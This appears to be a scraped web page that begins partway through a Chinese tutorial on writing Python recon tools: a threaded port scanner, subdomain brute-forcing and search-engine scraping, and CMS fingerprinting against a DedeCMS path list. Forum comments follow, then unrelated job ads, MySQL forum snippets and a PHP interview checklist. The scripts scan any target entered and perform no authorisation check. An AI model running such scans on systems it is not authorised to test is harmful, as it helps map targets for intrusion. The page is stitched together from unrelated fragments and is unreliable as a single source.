    domain = raw_input("PLEASE INPUT YOUR TARGET:")
    ip = Get_ip(domain)
    print 'IP:'+ip
    PortScan(ip)
if __name__=='__main__':  
    main()

速度是不是巨慢,既然是告别脚本小子,写个单线程的。。肯定是不行的,啊哈哈
放出多线程版本
[Python] 纯文本查看 复制代码
#-*- coding: UTF-8 -*-
import socket
import threading

lock = threading.Lock()
threads = []
def Get_ip(domain):  
    try:  
        return socket.gethostbyname(domain)  
    except socket.error,e:  
        print '[-]%s: %s'%(domain,e)  
        return 0 
 
def PortScan(ip,port):
    try:
        s=socket.socket() 
        s.settimeout(0.1)
        s.connect((ip,port))
        lock.acquire()
        openstr= "[-] PORT:"+str(port) +" OPEN "
        print openstr
        lock.release()
        s.close()
    except:
        pass
def main():
    banner = '''
                      _                       
     _ __   ___  _ __| |_ ___  ___ __ _ _ __  
    | '_ \ / _ \| '__| __/ __|/ __/ _` | '_ \ 
    | |_) | (_) | |  | |_\__ \ (_| (_| | | | |
    | .__/ \___/|_|   \__|___/\___\__,_|_| |_|
    |_|                                       

            '''
    print banner
    domain = raw_input("PLEASE INPUT YOUR TARGET:")
    ip = Get_ip(domain)
    print '[-] IP:'+ip
    for n in range(1,76):
        for p in range((n-1)*880,n*880):
            t = threading.Thread(target=PortScan,args=(ip,p))
            threads.append(t)
            t.start()     

        for t in threads:
            t.join()
    print ' This scan completed !'
if __name__=='__main__':  
    main()
image
很简单的,我都不知道该怎么讲。。。如果你基础知识还不够牢固,请移步至初级篇
Python大法从入门到编写POC
0x03 子域名采集脚本编写
image
采集子域名可以在测试范围内发现更多的域或子域,这将增大漏洞发现的几率。采集的方法也有很多方法,本文就不再过多的叙述了,采集方法的方法可以参考这篇文章
子域名搜集思路与技巧梳理
其实lijiejie大佬的subdomainbrute就够用了.....当然了,i春秋也有视频教程的。。。
Python安全工具开发应用
本文就演示三种吧
第一种是通过字典爆破,这个方法主要靠的是字典了....采集的多少取决于字典的大小了...
演示个单线程的吧
[Python] 纯文本查看 复制代码
#-*- coding: UTF-8 -*-
import requests
import re
import sys

def writtarget(target):
        print target
        file = open('result.txt','a')
        with file as f:
                f.write(target+'\n')

        file.close()


def targetopen(httptarget , httpstarget):


        header = {
                        'Connection': 'keep-alive',
                        'Pragma': 'no-cache',
                        'Cache-Control': 'no-cache',
                        'Upgrade-Insecure-Requests': '1',
                        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
                        'DNT': '1',
                        'Accept-Encoding': 'gzip, deflate',
                        'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8'
                }

        try:
                reponse_http = requests.get(httptarget, timeout=3, headers=header)
                code_http = reponse_http.status_code


                if (code_http == 200):
                        httptarget_result = re.findall('//.*', httptarget)

                        writtarget(httptarget_result[0][2:])

                else:
                        reponse_https = requests.get(httpstarget, timeout=3, headers=header)
                        code_https = reponse_https.status_code
                        if (code_https == 200):
                                httpstarget_result = re.findall('//.*', httpstarget)

                                writtarget(httpstarget_result[0][2:])


        except:
                pass

def domainscan(target):

        f = open('domain.txt','r')
        for line in f:
                httptarget_result = 'http://'+ line.strip() + '.'+target
                httpstarget_result = 'https://'+ line.strip() + '.'+target

                targetopen(httptarget_result, httpstarget_result)

        f.close()

if __name__ == "__main__":
        print ' ____                        _       ____             _       '
        print '|  _ \  ___  _ __ ___   __ _(_)_ __ | __ ) _ __ _   _| |_ ___ '
        print "| | | |/ _ \| '_ ` _ \ / _` | | '_ \|  _ \| '__| | | | __/ _ \  "
        print "| |_| | (_) | | | | | | (_| | | | | | |_) | |  | |_| | ||  __/"
        print '|____/ \___/|_| |_| |_|\__,_|_|_| |_|____/|_|   \__,_|\__\___|'
                                                              


        file = open('result.txt','w+')
        file.truncate()
        file.close()
        target = raw_input('PLEASE INPUT YOUR DOMAIN(Eg:ichunqiu.com):')
        print 'Starting.........'
        domainscan(target)
        print 'Done ! Results in result.txt'

image
第二种是通过搜索引擎采集子域名,不过有些子域名不会收录在搜索引擎中.....

参考这篇文章
工具| 手把手教你信息收集之子域名收集器
我觉得这篇文章介绍的还可以的....我也懒得写了,直接贴过来吧

[Python] 纯文本查看 复制代码
#-*-coding:utf-8-*-
import requests
import re
key="qq.com"
sites=[]
match='style="text-decoration:none;">(.*?)/'
for i in range(48):
   i=i*10
   url="http://www.baidu.com.cn/s?wd=site:"+key+"&cl=3&pn=%s"%i
   response=requests.get(url).content
   subdomains=re.findall(match,response)
   sites += list(subdomains)
site=list(set(sites))   #set()实现去重
print site
print "The number of sites is %d"%len(site)
for i in site:          
   print i

第三种就是通过一些第三方网站..实现方法类似于第二种
在之前的文章中介绍过,我就直接引用过来了
不会的话,就看这篇文章,很详细...
Python大法之从HELL0 MOMO到编写POC(五)
[Python] 纯文本查看 复制代码
import requests
import re
import sys
 
def get(domain):
        url = 'http://i.links.cn/subdomain/'
        payload = ("domain={domain}&b2=1&b3=1&b4=1".format(domain=domain))
        r = requests.post(url=url,params=payload)
        con = r.text.encode('ISO-8859-1')
        a = re.compile('value="(.+?)"><input')
        result = a.findall(con)
        list = '\n'.join(result)
        print list
if __name__ == '__main__':
        command= sys.argv[1:]
        f = "".join(command)
        get(f)

0x04 CMS指纹识别脚本编写
image
现在有很多开源的指纹识别程序,w3af,whatweb,wpscan,joomscan等,常见的识别的几种方式:
1:网页中发现关键字
2:特定文件的MD5(主要是静态文件、不一定要是MD5)
3:指定URL的关键字
4:指定URL的TAG模式

i春秋也有相应的课程
Python安全工具开发应用
本着买不起课程初心,啊哈哈,我就不讲ADO老师讲的方法了。。。啊哈哈
不过写的都差不多,只是用的模块不同。。。
本文我介绍两种方法,一种是通过API的。。另一种就是纯粹的指纹识别了,识别的多少看字典的大小了。。。
先说第一种。。。
说白了,就是发送个post请求,把关键字取出来就ok了,完全没有难度。。
我用的指纹识别网站是:http://whatweb.bugscaner.com/look/,我怎么感觉有种打广告的感觉。。。抓个包。。然后就一顿老套路
image
[Python] 纯文本查看 复制代码
#-*- coding: UTF-8 -*-
import requests
import json

def what_cms(url):
        headers = {
                'Connection': 'keep-alive',
                'Pragma': 'no-cache',
                'Cache-Control': 'no-cache',
                'Upgrade-Insecure-Requests': '1',
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
                'DNT': '1',
                'Accept-Encoding': 'gzip, deflate',
                'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8'
                    }
        post={
                'hash':'0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479',
                'url':url,
        }
        r=requests.post(url='http://whatweb.bugscaner.com/what/', data=post, headers=headers)
        dic=json.loads(r.text)
        if dic['cms']=='':
                print 'Sorry,Unidentified........'
        else:
                print 'CMS:' + dic['cms']
if __name__ == '__main__':
        url=raw_input('PLEASE INPUT YOUR TARGET:')
        what_cms(url)


cool。。
image


接下来,就是CMS指纹识别的第二种方法了。。。
我用的匹配关键字的方法。。。
找了个dedecms的匹配字典
[AppleScript] 纯文本查看 复制代码
范例:链接||||关键字||||CMS别称
/data/admin/allowurl.txt||||dedecms||||DedeCMS(织梦)
/data/index.html||||dedecms||||DedeCMS(织梦)
/data/js/index.html||||dedecms||||DedeCMS(织梦)
/data/mytag/index.html||||dedecms||||DedeCMS(织梦)
/data/sessions/index.html||||dedecms||||DedeCMS(织梦)
/data/textdata/index.html||||dedecms||||DedeCMS(织梦)
/dede/action/css_body.css||||dedecms||||DedeCMS(织梦)
/dede/css_body.css||||dedecms||||DedeCMS(织梦)
/dede/templets/article_coonepage_rule.htm||||dedecms||||DedeCMS(织梦)
/include/alert.htm||||dedecms||||DedeCMS(织梦)
/member/images/base.css||||dedecms||||DedeCMS(织梦)
/member/js/box.js||||dedecms||||DedeCMS(织梦)
/php/modpage/readme.txt||||dedecms||||DedeCMS(织梦)
/plus/sitemap.html||||dedecms||||DedeCMS(织梦)
/setup/license.html||||dedecms||||DedeCMS(织梦)
/special/index.html||||dedecms||||DedeCMS(织梦)
/templets/default/style/dedecms.css||||dedecms||||DedeCMS(织梦)
/company/template/default/search_list.htm||||dedecms||||DedeCMS(织梦)

全的字典去百度吧,小弟不才......小弟用的是deepin,win的报错太鸡肋,实在懒得解决。。。。
[Python] 纯文本查看 复制代码
#-*- coding: UTF-8 -*-
import os
import threading
import urllib2

identification = False
g_index = 0
lock = threading.Lock()

def list_file(dir):
    files = os.listdir(dir)
    return  files

def request_url(url='', data=None, header={}):
    page_content = ''
    request = urllib2.Request(url, data, header)

    try:
        response = urllib2.urlopen(request)
        page_content = response.read()
    except Exception, e:
        pass

    return page_content

def whatweb(target):
    global identification
    global g_index
    global cms

    while True:
        if identification:
            break

        if g_index > len(cms)-1:
            break

        lock.acquire()
        eachline = cms[g_index]
        g_index = g_index + 1
        lock.release()

        if len(eachline.strip())==0 or eachline.startswith('#'):
            pass
        else:
            url, pattern, cmsname = eachline.split('||||')
            html = request_url(target+url)
            rate = float(g_index)/float(len(cms))
            ratenum = int(100*rate)

            if pattern.upper() in html.upper():
                identification = True
                print " CMS:%s,Matched URL:%s" % (cmsname.strip('\n').strip('\r'), url)
                break
    return


if __name__ == '__main__':
    print '''
          __        ___           _    ____ __  __ ____  
          \ \      / / |__   __ _| |_ / ___|  \/  / ___| 
           \ \ /\ / /| '_ \ / _` | __| |   | |\/| \___ \ 
            \ V  V / | | | | (_| | |_| |___| |  | |___) |
             \_/\_/  |_| |_|\__,_|\__|\____|_|  |_|____/ 
    '''
    threadnum = int(raw_input(' Please input your threadnum:'))
    target_url = raw_input(' Please input your target:')

    f = open('./cms.txt')
    cms = f.readlines()
    threads = []

    if target_url.endswith('/'):
        target_url = target_url[:-1]

    if target_url.startswith('http://') or target_url.startswith('https://'):
        pass
    else:
        target_url = 'http://' + target_url

    for i in range(threadnum):
        t = threading.Thread(target=whatweb, args=(target_url,))
        threads.append(t)

    print ' The number of threads is %d' % threadnum
    print 'Matching.......'
    for t in threads:
        t.start()

    for t in threads:
        t.join()

    print " All threads exit"

image
cool。。。这样就简单的实现CMS识别。。。
最近好久不写文章,手法生疏了,各位dalao见谅。。。。
最后,分享一首歌。。Kris Wu的天地
天地
特别喜欢‘江湖人说我不行,古人说路遥知马力,陪我走陪我闯天地,我从不将就我的命运’这块。。
另外,小弟没钱吃饭了,各位dalao,救救孩子吧
image
本集完
给大佬打call,内容很实用,每章都会仔细学习,动手练习,python进步很快
给大佬打call,内容很实用,每章都会仔细学习,动手练习,python进步很快 给大佬打call,内容很实用,每章都会仔细学习,动手练习,python进步很快 大佬的Python 多线程写的溜啊。佩服佩服 魔磨魔魔魔法币  感谢分享 牛逼  文章很给力 活捉大佬一枚,文章写得贼666 哇,阿甫哥哥终于更新了 沙发自占,啊哈哈哈
过来瞧瞧先 自此一下 霸总你好,霸总再见 救救孩子吧 哈哈 皮 我也去试试 感谢大佬的分享
          (IT) Java/ESB Developer      Cache   Translate Page   Web Page Cache   

Rate: £550 - £650 per Day   Location: London   

2 x Java/ESB Developers - Investment Banking You will work towards implementing new and enhancing existing application integration projects within the Middleware framework. Key Skills Minimum of 7 years Java Development experience Integration architecture and design experience Experience in using Object Oriented Analysis, in particular UML Experience in using TDD/BDD agile methodology Experience in integrating widely used trading, risk and processing platforms such as Murex or Similar (with good knowledge of the underlying messaging schemas such as MxML) Experience withPublish/Subscribe messaging paradigms, distributed transaction processing based on JTA/JTS Specifically experience with JBoss, JMS, Spring, Hibernate Strong UNIX skills in particular Linux Strong relational database skills - Sybase, SQL Server, MySQL Knowledge of source control such as Subversion Experience of using JUnit and jMock Experience in defining and implementing web services (REST paradigm) and data services (eg OData) Desired Skills Experience in integrating widely used trading, risk and processing platforms such as Murex or Similar (with good knowledge of the underlying messaging schemas such as MxML) A broad understanding of Fixed Income, Equity and/or Futures processing through investment banking experience Experience of working with XML based technologies such as XSLT, JAXB Experience in implementing vendor proprietary Real Time connectors using JCA Experience of Subversion, Maven and Atlassian ALM/SDLC tools (Jira, Bamboo, Crucible, FishEye, Confluence) or Hudson Experience with AMQP Experience with WCF, MSMQ integration Experience with Fuse ESB or similar Experience with NoSQL such as MongoDB Morgan McKinley is acting as an Employment Agency in relation to this vacancy. Please note that any references to salary or pay rates in this advertisement and in the salary refinement section are indicative only and should only be used as a guide.
 
Rate: £550 - £650 per Day
Type: Contract
Location: London
Country: UK
Contact: Donato Basso
Advertiser: Morgan McKinley UK
Start Date: ASAP
Reference: JS-BBBH695530

          Create a subscription system with my data.      Cache   Translate Page   Web Page Cache   
Hi, We have two wordpress websites abc.com and blog.abc.com from these two websites we are generating leads. Now we want a subscription platform to sell these leads online we have selected such application... (Budget: ₹1500 - ₹12500 INR, Jobs: HTML, Laravel, MySQL, PHP, Website Design)
          MySQL 8.0      Cache   Translate Page   Web Page Cache   
Hi, I'm totally new to MySQL and trying to find some advice. Has anyone got the MySQL 8.0 error: 1001? What does this errorcode mean? Thanks very much in advance for all your help
          Insert query for dynamic form using php      Cache   Translate Page   Web Page Cache   
heY guys :) recently I'm on web project which I use MySQL, bootstrap, PHP and Javascript. For this I have generated successfully dynamical forms using PHP. I'm using mysqli commands. I used dynamic forms if it not used I have to create hundred of html pages. So by doing this ...
          How to use mysqli_real_escape_string with arrays ?      Cache   Translate Page   Web Page Cache   
Recently I'm trying to pass text boxes , radio buttons and checkboxes vaues to database. For that for the clear understanding I'll provide simple way of form.




New
          CRM like "Zoho"      Cache   Translate Page   Web Page Cache   
I am looking for a CRM like Zoho. Web app has to be identical & should have features exactly similar to Zoho CRM. Web app in PHP language with multi language. Bid only if you have a proper document and or demo... (Budget: €250 - €750 EUR, Jobs: CRM, HTML, MySQL, PHP, Software Architecture)
          CRM like "Zoho"      Cache   Translate Page   Web Page Cache   
I am looking for a CRM like Zoho. Web app has to be identical & should have features exactly similar to Zoho CRM. Web app in PHP language with multi language. Bid only if you have a proper document and or demo... (Budget: €250 - €750 EUR, Jobs: CRM, HTML, MySQL, PHP, Software Architecture)
          Cakephp Tree Menu using Bootstrap Collapsible accordion      Cache   Translate Page   Web Page Cache   
Hi, I need to build the Controller and view in Cakephp of a Collapsible Tree Menu with Bootstrap accordion like so https://bootsnipp.com/snippets/featured/collapsible-tree-menu-with-accordion The... (Budget: $10 - $30 USD, Jobs: CakePHP, Javascript, jQuery / Prototype, MySQL, PHP)
          Software Developer - SkipTheDishes - Saskatoon, SK      Cache   Translate Page   Web Page Cache   
Experience with Java 8, Python, React or MySQL is an asset. Apply your understanding of software architecture, and cutting-edge tools and technology to maintain...
From SkipTheDishes - Sat, 23 Jun 2018 06:14:46 GMT - View all Saskatoon, SK jobs
          MySQL for Advanced Analytics Tips, Tricks, & Techniques      Cache   Translate Page   Web Page Cache   

MySQL for Advanced Analytics Tips, Tricks, & Techniques

MySQL for Advanced Analytics: Tips, Tricks, & Techniques
MP4 | Video: 720p | Duration: 41:58 | English | Subtitles: VTT | 125.6 MB




          Integração Magento com Totvs Protheus      Cache   Translate Page   Web Page Cache   
Bom dia Gostariamos de desenvolver um módulo magento para fazer a integração completa da plataforma com o Protheus da Totvs. Temos interesse em profissionais que já tem desenvolvido algo relacionado ao magento x protheus anteriormente e tenha dominio real sobre a integração... (Budget: $250 - $750 USD, Jobs: ERP, Magento, MySQL, PHP, Software Architecture)
          Integração Magento com Totvs Protheus      Cache   Translate Page   Web Page Cache   
Bom dia Gostariamos de desenvolver um módulo magento para fazer a integração completa da plataforma com o Protheus da Totvs. Temos interesse em profissionais que já tem desenvolvido algo relacionado ao magento x protheus anteriormente e tenha dominio real sobre a integração... (Budget: $250 - $750 USD, Jobs: ERP, Magento, MySQL, PHP, Software Architecture)
          Software Developer - SkipTheDishes - Saskatoon, SK      Cache   Translate Page   Web Page Cache   
Experience with Java 8, Python, React or MySQL is an asset. Apply your understanding of software architecture, and cutting-edge tools and technology to maintain...
From SkipTheDishes - Sat, 23 Jun 2018 06:14:46 GMT - View all Saskatoon, SK jobs
          AMD EPYC Performance Testing… or Don’t get on the wrong side of SystemD      Cache   Translate Page   Web Page Cache   
Ubuntu 16 AMD EPYC

Ever since AMD released their EPYC CPU for servers I wanted to test it, but I did not have the opportunity until recently, when Packet.net started offering bare metal servers for a reasonable price. So I started a couple of instances to test Percona Server for MySQL under this CPU. In this benchmark, I discovered some […]

The post AMD EPYC Performance Testing… or Don’t get on the wrong side of SystemD appeared first on Percona Database Performance Blog.


          dotConnect for MySQL 8.11      Cache   Translate Page   Web Page Cache   
ADO.NET provider for MySQL with Entity Framework,LinqConnect,NHibernate Support
          Build a functional Website      Cache   Translate Page   Web Page Cache   
- capable of storing reviews - search through listings - book appointment times - account signup - B2B and B2C (Budget: $30 - $250 CAD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          PHP, Framework Symfony trabajo remoto      Cache   Translate Page   Web Page Cache   
Requiero mejorar un proyecto en 6 puntos principales del proyecto, el proyecto se debe con dedicación de 4 horas diarias y de forma remota, se trabaja en coordinación con la líder del proyecto. (Budget: $2 - $8 USD, Jobs: MySQL, PHP, Symfony PHP)
          oDoo Customization      Cache   Translate Page   Web Page Cache   
We need help with some setup/customization or apps etc within Oddo.sh (Budget: $8 - $15 USD, Jobs: ERP, MySQL, PHP, Python, Software Architecture)
          Software Developer (PHP) at Supermart.ng      Cache   Translate Page   Web Page Cache   
Supermart.ng, Nigeria&#39;s leading online supermarket. If you desire to work in a fast paced environment, and experience rapid personal and career growth while making a tremendous impact in society, then this might be the company for you. We offer a truly entrepreneurial experience in a fast paced, yet structured environment, work within a proudly Nigerian company built by young, talented and dynamic entrepreneurs. We operate a structured yet fun and easy-going work environment and also a management trainee and in-house entrepreneurial mentor-ship program.&nbsp;Job DescriptionDesign, build, and maintain efficient, reusable, and reliable PHP codeIntegration of data storage solutions (MySQL, MongoDB)Building Restful APIs.Identify bottlenecks and bugs, and devise solutions to these problemsHelp maintain code quality, organization and automatizationWriting automated test using codeception.Solving complex performance problems and architectural challenges.&nbsp;

Apply at https://ngcareers.com/job/2018-07/software-developer-php-at-supermart-ng-388/


          PHP, Framework Symfony trabajo remoto      Cache   Translate Page   Web Page Cache   
Requiero mejorar un proyecto en 6 puntos principales del proyecto, el proyecto se debe con dedicación de 4 horas diarias y de forma remota, se trabaja en coordinación con la líder del proyecto. (Budget: $2 - $8 USD, Jobs: MySQL, PHP, Symfony PHP)
          oDoo Customization      Cache   Translate Page   Web Page Cache   
We need help with some setup/customization or apps etc within Oddo.sh (Budget: $8 - $15 USD, Jobs: ERP, MySQL, PHP, Python, Software Architecture)
          développeur d'applications mobiles - Tundra Technical - Québec City, QC      Cache   Translate Page   Web Page Cache   
Programmation Java, Objective C, C++, ASP .Net, C#, MySQL, HTML5, CSS3, XML, JS, AJAX. Type de poste*:....
From Indeed - Tue, 10 Jul 2018 15:21:48 GMT - View all Québec City, QC jobs
          Web development      Cache   Translate Page   Web Page Cache   
J'ai besoin de réparer un site Internet (Budget: $250 - $750 USD, Jobs: MySQL, Shopify, System Admin, WordPress)
          XAMPP for Windows 7.2.7      Cache   Translate Page   Web Page Cache   
Description: XAMPP for Windows is an easy to install Apache distribution for Windows containing MySQL, PHP and Perl.XAMPP is an Apache distribution containing MySQL, PHP and Perl.Many people know from their own experience that it's not easy to install an Apache web server and it gets harder if you want to add MySQL, PHP and […]
          XAMPP for Windows 7.2.7      Cache   Translate Page   Web Page Cache   
Description: XAMPP for Windows is an easy to install Apache distribution for Windows containing MySQL, PHP and Perl.XAMPP is an Apache distribution containing MySQL, PHP and Perl.Many people know from their own experience that it's not easy to install an Apache web server and it gets harder if you want to add MySQL, PHP and […]
          Senior Network Administrator - Northbay - Lahore      Cache   Translate Page   Web Page Cache   
Installation, configuration, backup and administration of MYSQL, MSSQL, Postgres and NOSQ(MongoDB) Database Servers....
From Northbay - Mon, 09 Jul 2018 06:40:14 GMT - View all Lahore jobs
          Web development      Cache   Translate Page   Web Page Cache   
J'ai besoin de réparer un site Internet (Budget: $250 - $750 USD, Jobs: MySQL, Shopify, System Admin, WordPress)
          Web development      Cache   Translate Page   Web Page Cache   
J'ai besoin de réparer un site Internet (Budget: $250 - $750 USD, Jobs: MySQL, Shopify, System Admin, WordPress)
           URGENT vacancy for web designer/developer in Tata       Cache   Translate Page   Web Page Cache   
Salary period: Yearly, Position type: Full-time,
URGENT vacancy for web designer/developer in Tata Consultancy Services (TCS)
Btech/bca Html/java/JavaScript/JQuery/Jason/MySQL... https://www.olx.in/hi/item/urgent-vacancy-for-web-designer-developer-in-tata-ID1lOafH.html
          Web development      Cache   Translate Page   Web Page Cache   
J'ai besoin de réparer un site Internet (Budget: $250 - $750 USD, Jobs: MySQL, Shopify, System Admin, WordPress)
          Oscar Associates Limited: PHP Developer      Cache   Translate Page   Web Page Cache   
£30k - £40k pa + Benefits: Oscar Associates Limited: PHP Developer | PHP, Laravel, HTML | Harpenden | £40,000 PHP, Laravel, HTML, CSS, MySQL, Back-end, LAMP, Developer, Experience, Web. The Role PHP Developer | We are currently on the lookout for a PHP 7, Laravel, Symfony, HTML, CSS, Developer to join an es Hatfield
          睿备份(系统备份文件下载)V4.0.7 绿色版 V4.0.7 绿色版      Cache   Translate Page   Web Page Cache   
睿备份(系统备份文件下载)是一款自主数据库实时监控备份引擎!纯“绿色化”、无需安装、操作便捷。跨平台支持本地/远程mssql、oracle、mysql、postgresql、达梦等数据库完全、增量、事务日志备份。类windows计划任务模式的备份任务设置,可自由组合无限复合式备份任务;支持备份文件zip压缩后通过lan/ftp/云/email传输存储,自由删除指定周期与存储位置的备份文件;支持第三方数据库备份文件的恢复;独有“睿云”技术,全面实现端到端、平台到端备份指令推送与日志管理等功能。特色介绍:1、高效数据库备份引擎将备份任务分析与数据库备...
          Sales and marketing and Web Programmer      Cache   Translate Page   Web Page Cache   
We are Hiring Sales and Web Designer. - Female with Pleasing Personality (20-25yr old) for sales. -At least 1 year experience in sales and field marketing. -Graduate 4 years -Ability to do multi tasking -Must be families with Microsoft Office application. -Good communication, impressing and writing skills -Skills of Programming. -HTML5, CSS,PHP,MYSQL,PHOTOSHOP -Familer with Wordpress and similar CMS. -
          How to skip the validation of primary Key in MYSQL (1 reply)      Cache   Translate Page   Web Page Cache   
i am trying to migrate the database from oracle to MYSQL. Oracle has duplicate values in a table, i am assuming primary key might have been enabled with novalidate option. Could someone guide me the equivalent method to perform the same in MYSQL.

Note:- i have tried 'alter table table_name add primary key (column1, column2) enable novlidate' , but this didnt work.
          Complete Project Stock Market Data with Custom Technical Analysis Filtering (Historical and RealTime)      Cache   Translate Page   Web Page Cache   
Simply putting it together, long story short. Need a custom Technical Analysis Real Time filtering and coding platform along with a data scraped from multiple reliable sources. Exchanges to work with (NSE, BSE and if possible MCX) ... (Budget: ₹1500 - ₹12500 INR, Jobs: Javascript, JSP, MySQL, PHP, Web Development)
          MySQL for Advanced Analytics Tips, Tricks, & Techniques      Cache   Translate Page   Web Page Cache   
MySQL for Advanced Analytics: Tips, Tricks, & Techniques MP4 | Video: 720p | Duration: 41:58 | English | Subtitles: VTT | 125.6 MB
          Problema com migração no wordpress      Cache   Translate Page   Web Page Cache   
Estou migrando o meu site em wordpress para outro servidor. Eu já fiz toda a migração, mas está aparecendo uma mensagem de erro referente ao plugin W3 TOTAL CACHE que não sei o por que não está mais instalado e não consigo achar ele para instalar novamente... (Budget: $30 - $250 USD, Jobs: CSS, HTML, MySQL, PHP, WordPress)
          Percona XtraDB Cluster Analysis      Cache   Translate Page   Web Page Cache   
Hi, I have been hired as a consultant for a week in order to investigate a MySQL system which has been having performance issues. I arrived on the...
          PHP 面试知识大汇总      Cache   Translate Page   Web Page Cache   

该仓库主要真是国内 PHP 面试经常被问到的知识点做汇总。 仅是针对性指出知识点,相应还需自己查找相关资料系统学习。 我希望各位能不仅仅了解是什么,还要了解为什么,以及背后的原理。

如果您有对相应知识点非常系统的资料,欢迎 PR 增加链接。

基础篇

  • 了解大部分数组处理函数
  • 字符串处理函数(区别 mb_ 系列函数)
  • & 引用,结合案例分析
  • == 与 === 区别
  • isset 与 empty 区别
  • 全部魔术函数理解
  • static、$this、self 区别
  • private、protected、public、final 区别
  • OOP 思想
  • 抽象类、接口 分别使用场景
  • Trait 是什么东西
  • echo、print、print_r 区别
  • __construct 与 __destruct 区别
  • static 作用(区分类与函数内)
  • __toString() 作用
  • 单引号’ 与双引号 “ 区别
  • 常见 HTTP 状态码,分别代表什么含义
  • 301 什么意思 404 呢

进阶篇

  • Autoload、Composer 原理
  • Session 共享、存活时间
  • 异常处理
  • 如何 foreach 迭代对象
  • 如何数组化操作对象 $obj[key]
  • 如何函数化对象 $obj(123);
  • yield 是什么,说个使用场景
  • PSR 是什么,PSR-1, 2, 4, 7
  • 如何获取客户端 IP 和 服务端 IP 地址
  • 如何开启 PHP 异常提示
  • 如何返回一个301重定向
  • 如何获取扩展安装路径
  • 字符串、数字比较大小的原理,注意 0 开头的8进制、0x 开头16进制
  • BOM 头是什么,怎么除去
  • 什么是 MVC
  • 依赖注入实现原理
  • 如何异步执行命令
  • 模板引擎是什么,解决什么问题、实现原理(Smarty、Twig、Blade)
  • 如何实现链式操作$obj->w()->m()->d();
  • Xhprof 、Xdebug 性能调试工具使用
  • 索引数组[1, 2]与关联数组['k1'=>1, 'k2'=>2]有什么区别
  • 依赖注入原理

实践篇

  • 给定二维数组,根据某个字段排序
  • 如何判断上传文件类型,如:仅允许 jpg 上传
  • 不使用临时变量交换两个变量的值$a=1; $b=2;=>$a=2; $b=1;
  • strtoupper 在转换中文时存在乱码,你如何解决?php echo strtoupper('ab你好c');
  • Websocket、Long-Polling、Server-Sent Events(SSE) 区别
  • "Headers already sent" 错误是什么意思,如何避免

算法篇

  • 快速排序(手写)
  • 冒泡排序(手写)
  • 二分查找(了解)
  • 查找算法 KMP(了解)
  • 深度、广度优先搜索(了解)

数据结构篇(了解)

  • 堆、栈特性
  • 队列
  • 哈希表
  • 链表

对比篇

  • Cookie 与 Session 区别
  • GET与POST区别
  • include与require区别
  • include_once与require_once区别
  • Memcached 与 Redis 区别
  • MySQL 各个存储引擎、及区别(一定会问 MyISAM 与 Innodb 区别)
  • HTTP 与 HTTPS 区别
  • Apache 与 Nginx 区别
  • define() 与 const 区别
  • traits 与 interfaces 区别 及 traits 解决了什么痛点?
  • Git 与 SVN 区别

数据库篇

  • MySQL
    • CRUD
    • JOIN、LEFT JOIN 、RIGHT JOIN、INNER JOIN
    • UNION
    • GROUP BY + COUNT + WHERE 组合案例
    • 常用 MySQL 函数,如:now()、md5()、concat()、uuid()等
    • 1:1、1:n、n:n各自适用场景
    • 数据库优化手段
      • 索引、联合索引(命中条件)
      • 分库分表(水平分表、垂直分表)
      • 分区
      • 会使用explain分析 SQL 性能问题,了解各参数含义
      • Slow Log(有什么用,什么时候需要)
  • MSSQL(了解)
    • 查询最新5条数据
  • NOSQL
    • Redis、Memcached、MongoDB
    • 对比、适用场景
    • 你之前为了解决什么问题使用的什么,为什么选它?

服务器篇

  • 查看 CPU、内存、时间、系统版本等信息
  • find 、grep 查找文件
  • awk 处理文本
  • 查看命令所在目录
  • 自己编译过 PHP 吗?如何打开 readline 功能
  • 如何查看 PHP 进程的内存、CPU 占用
  • 如何给 PHP 增加一个扩展
  • 修改 PHP Session 存储位置、修改 INI 配置参数
  • 负载均衡有哪几种,挑一种你熟悉的说明其原理
  • 数据库主从复制 M-S 是怎么同步的?是推还是拉?会不会不同步?怎么办
  • 如何保障数据的可用性,即使被删库了也能恢复到分钟级别。你会怎么做。
  • 数据库连接过多,超过最大值,如何优化架构。从哪些方便处理?
  • 502 大概什么什么原因? 如何排查 504呢?

架构篇

  • 偏运维(了解):
    • 负载均衡(Nginx、HAProxy、DNS)
    • 主从复制(MySQL、Redis)
    • 数据冗余、备份(MySQL增量、全量 原理)
    • 监控检查(分存活、服务可用两个维度)
    • MySQL、Redis、Memcached Proxy 、Cluster 目的、原理
    • 分片
    • 高可用集群
    • RAID
    • 源代码编译、内存调优
  • 缓存
    • 工作中遇到哪里需要缓存,分别简述为什么
  • 搜索解决方案
  • 性能调优
  • 各维度监控方案
  • 日志收集集中处理方案
  • 国际化
  • 数据库设计
  • 静态化方案

框架篇

  • ThinkPHP(TP)、CodeIgniter(CI)、Zend(非 OOP 系列)
  • Yaf、Phalcon(C 扩展系)
  • Yii、Laravel、Symfony(纯 OOP 系列)
  • Swoole、Workerman (网络编程框架)
  • 对比框架区别几个方向点
    • 是否纯 OOP
    • 类库加载方式(自己写 autoload 对比 composer 标准)
    • 易用性方向(CI 基础框架,Laravel 这种就是高开发效率框架以及基础组件多少)
    • 黑盒(相比 C 扩展系)
    • 运行速度(如:Laravel 加载一大堆东西)
    • 内存占用

设计模式

  • 单例模式(重点)
  • 工厂模式(重点)
  • 观察者模式(重点)
  • 依赖注入(重点)
  • 装饰器模式
  • 代理模式
  • 组合模式

安全篇

  • SQL 注入
  • XSS 与 CXRF
  • 输入过滤
  • Cookie 安全
  • 禁用mysql_系函数
  • 数据库存储用户密码时,应该是怎么做才安全
  • 验证码 Session 问题
  • 安全的 Session ID (让即使拦截后,也无法模拟使用)
  • 目录权限安全
  • 包含本地与远程文件
  • 文件上传 PHP 脚本
  • eval函数执行脚本
  • disable_functions关闭高危函数
  • FPM 独立用户与组,给每个目录特定权限
  • 了解 Hash 与 Encrypt 区别

高阶篇

  • PHP 数组底层实现 (HashTable + Linked list)
